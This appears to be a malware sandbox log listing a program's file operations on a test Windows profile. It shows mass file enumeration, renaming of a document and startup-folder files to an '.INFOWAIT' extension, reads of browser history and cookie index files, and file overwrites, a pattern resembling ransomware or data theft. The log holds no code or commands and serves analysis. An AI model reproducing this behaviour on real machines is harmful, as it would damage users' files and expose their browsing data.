Get Info	C:\ProgramData\Microsoft Help\MS.VISIO.DEV.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.VISIO.SHAPESHEET.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.VISIO_PRM.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.VISIO_STD.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.WINPROJ.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.WINPROJ.DEV.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.WINWORD.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\MS.WINWORD.DEV.14.1033.hxn	type = size	1	Fn
Get Info	C:\ProgramData\Microsoft Help\nslist.hxl	type = size	1	Fn
Get Info	C:\ProgramData\Mozilla\logs\maintenanceservice-install.log	type = size	1	Fn
Get Info	C:\ProgramData\Sun\Java\Java Update\jaureglist.xml	type = size	1	Fn
Get Info	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi	type = size	1	Fn
Get Info	C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-3gHp4i8DBQd4Fi.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\32XcKJ-k MnUkqXRq.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7UQS1.docx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\86iUKOznOtmWr4FTVK.xlsx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\-l0TaG633wu CFDx3Y-.doc	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\SNwh\2L5Mp4CJ.ods	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\SNwh\3-Cn.ods	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\Ukc9zVsmz.xlsx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\C0QT-PiM3F.pps	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\6qkqye2rCRGlE5P.ppt	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\d8R9rMlCN.odp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FIhr5H47kz.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FiwjPlFCBQK4Eudei\4aIc13i42g6djkDS.docx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FiwjPlFCBQK4Eudei\S6KMJ lP85NJg.ppt	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\MGAfBc25T.ots	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\pplpY8py2zNIuuEmOh7.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\shTUZEa.ppt	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\Kgbiq-5bFu_gdXcNS.csv	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\pjRRywz moQN7y4K4.ots	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\r7-FdG2eJ6-ET_j.doc	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\FLEcvhR.xls	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\c4-yyhR.ods	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\obgiME5jO2.docx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\tkO6bl.odp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\U9tSiBmpae-S.ppt	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\wLIFp9Xlr__Upjp5BWpB.xls	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\l8fJ\p2jEbzbiEY.odp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\l8fJ\YeV-uPfMbHLLcGMe_f.odt	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\POzUPkpR60DTM.xlsx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\4xdI4OMOFBx3cqRfxwA0.xlsx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\aI-hq-hLGIh9RDS.xls	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\EoZDJddZ6evy.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\F0LyAv7a.xls	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\frr7vMqqzTzgf.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GkFwBZ26Jl.docx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\H2j6tPl2-Uy7a_CTb.docx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Hy6vDgJFghnTAj77.xlsx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\I_5X.xlsx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kDhx0.ods	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\r0_POyzPZT.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rsqxo_hm.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\unlt.docx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\v7CbnDwOOLwRsSR.xlsx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WBCuWSQzDcN3.xlsx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\YfljSHP679zr.docx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yvz8Ck.xls	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\YzRpjUWu6VDm3TLDV.pptx	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Downloads\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Links\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Links\Desktop.lnk	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Links\Downloads.lnk	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Links\RecentPlaces.lnk	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\-Fn54ZOPOU2DZgY9Xjjc.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\0XQBmq5ckaU.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\8E9H31N.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\b ZEoraAV.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\kJFrd7NImQEQs.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\NBd6m3qs3.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\Qj0Bxz9rAG9Fja0Mk.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\r7FR3hZryb5hq9Ud7NX.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\UrqJ.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\XRQKbLhwuLoes9nMF eV.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\zDJHX2UBtq2jNGLqtNRG.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\6G5yHmu-I-1.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Au5gZJs3.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\fWq7Sf.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\JfvP6S4i2D.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nJqpjpjhgkzg.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\5Lx3KHr.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\pkWtVne.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\tEL2.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\U0AZd0ivGrf _Re 2c.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\X8qNDeYP35alh231JX16.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\CZRVI9TRu5syJMCnyOV.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\Lkq3 EjT.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\M3mvj.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\2qDES9yWeof3.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\GYnW7LZ.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\k7CM6LvXyF9LPZI6yh2.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\nxKQUQU2ESS.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\P-MyT-xFsgCgO.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\U eCzQsa89w8ys.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\wlnli51d9s.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\ya4k9CP4ga90mFZW.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\_Xt1XKuQQyohA.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\_PnpDAir3.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\VmQaguirc.mp3	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\w52qqQUsQntD6lz uu_3.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\y1mkaun.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\y1w5ZZtxeCJCqVDGm8rd.wav	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\_ERMKi.m4a	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-bVmT_XCtJmzFCE.png	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\A3o-tRWcczzg.png	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\gwCCr5SN1.bmp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\KCFGl8AGb.jpg	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\4DWhN6RhpgdCQKemK.gif	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\FN7 jccu.png	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\IMEhPArBi5zDx-qN3xQn.png	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\l7-qaXxV0q.gif	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\znFXRDcUkqphQAEI4ui.bmp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\cc0AC KvAZVVI8uX.gif	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\EEWWiY3V3RdCY.gif	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\IEv7z27qsVTekHpr.bmp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\ZEsdNS.jpg	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\ZVtPiW.bmp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\7FDM.jpg	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\8q988doXb.png	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\B-lTUwZlpVSP7x8c.gif	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\2QiXDoa8V yuTWH7Q.bmp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\4haF6sPbyW_.gif	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\8B9CArYYR-k5_6.jpg	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\k-DDYba4e9vKH.png	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\rGw15KQUy_H3LYwN5\ni-jXUyMmKeOU4Zi2aIU.png	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\ubh3Kx_A\rtYIqoqrRvq.bmp	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\ubh3Kx_A\_NTc8TO6LpPJ5zXjg.gif	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\5NOeuuWGic W5vSvZ.png	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\RCe6gFP9n8QcDK.gif	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\u8Rrvn5zJ.jpg	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Saved Games\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8HC y_m_mnm8.swf	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8oeI6XU5 vjIz.avi	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\desktop.ini	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\-x3FnD.avi	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\3w7z.flv	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\baHs2DdbqE.swf	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\BflhCY_h.mp4	type = size	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\CrDx78k.mkv	type = size	1	Fn
Get Info	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	type = size	1	Fn
Get Info	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\index.dat	type = size	1	Fn
Get Info	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	type = size	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kDhx0.ods.INFOWAIT	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kDhx0.ods	1	Fn
Move	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.INFOWAIT	source_filename = C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	1	Fn
Move	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\index.dat.INFOWAIT	source_filename = C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\index.dat	1	Fn
Move	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.INFOWAIT	source_filename = C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	1	Fn
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\History\desktop.ini	size = 153600, size_out = 145	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	size = 153600, size_out = 145	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	size = 153600, size_out = 16384	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	size = 153600, size_out = 67	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat	size = 153600, size_out = 32768	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\desktop.ini	size = 153600, size_out = 67	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\desktop.ini	size = 153600, size_out = 67	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\desktop.ini	size = 153600, size_out = 67	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\desktop.ini	size = 153600, size_out = 67	1	Fn Data
Read	C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	size = 153600, size_out = 67	1	Fn Data
Read	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\index.dat	size = 153600, size_out = 16384	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\desktop.ini	size = 412	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\desktop.ini	size = 402	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kDhx0.ods	size = 53402	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\desktop.ini	size = 216	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Downloads\desktop.ini	size = 282	1	Fn Data
